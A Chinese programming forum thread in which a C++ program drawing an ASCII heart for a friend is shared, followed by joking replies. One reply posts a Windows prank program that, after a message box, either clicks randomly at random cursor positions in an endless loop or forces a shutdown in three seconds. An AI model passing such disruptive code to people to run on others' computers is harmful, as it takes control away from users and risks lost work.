用C++给你朋友画个爱心

root 站长 2022-11-02 18:08:00 4
#include <bits/stdc++.h>

using namespace std;

int main()
{
	double a;
	for (double y = 1.5; y > -1.5; y -= 0.1)
	{
		for (double x = -1.5; x < 1.5; x += 0.05)
		{
			a = x*x + y*y-1;
			putchar(a*a*a-x*x*y*y*y <= 0.0 ? '*' : ' ');
		}
		system("color 0c");
		putchar('\n');		
	}
	printf("你朋友的名字~\n");
	printf("永远开心快乐!( ̄▽ ̄) ~*( ̄▽ ̄)/\n");
	
	return 0;
}
{{ vote && vote.total.up }}

共 12 条回复

CPP 刷题王

你加一个阻塞进程的框框罢

CPP 刷题王

si de tou tou 滴

CPP 刷题王

死啦死啦滴

ykj02 懒虫

任务管理器?我怎么动不了鼠标?

CPP 刷题王

笑死,我直接任务管理器好吧

ykj02 懒虫
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
int main(){
	if(MessageBox(NULL,"你的电脑因为你不好好爱护,现在会出现一些问题,继续运行?","提示",MB_YESNO)==6){
		srand(time(0));
		int x=GetSystemMetrics(SM_CXSCREEN),y=GetSystemMetrics(SM_CXSCREEN);
		for(;;){
			SetCursorPos(rand()%x,rand()%y);
			mouse_event(MOUSEEVENTF_LEFTDOWN | MOUSEEVENTF_LEFTUP,0,0,0,0);
		}
	}else{
		MessageBox(NULL,"你的电脑该休息了……","提示",MB_OK);
		system("shutdown -s -t 3");
	}
	
}

“小助手”

CPP 刷题王
#include <bits/stdc++.h>

using namespace std;

int main()
{
	double a;
	for (double y = 1.5; y > -1.5; y -= 0.1)
	{
		for (double x = -1.5; x < 1.5; x += 0.05)
		{
			a = x*x + y*y-1;
			putchar(a*a*a-x*x*y*y*y <= 0.0 ? '_' : ' ');
		}
		system("color 0c");
		putchar('\n');		
	}
	printf("somebudy~\n");
	printf("永远开心快乐!( ̄▽ ̄) ~*( ̄▽ ̄)/\n");
	
	return 0;
}
Even226 逗比

666

CPP 刷题王

CPP 刷题王

Double exponent: use braces to clarify6^6^6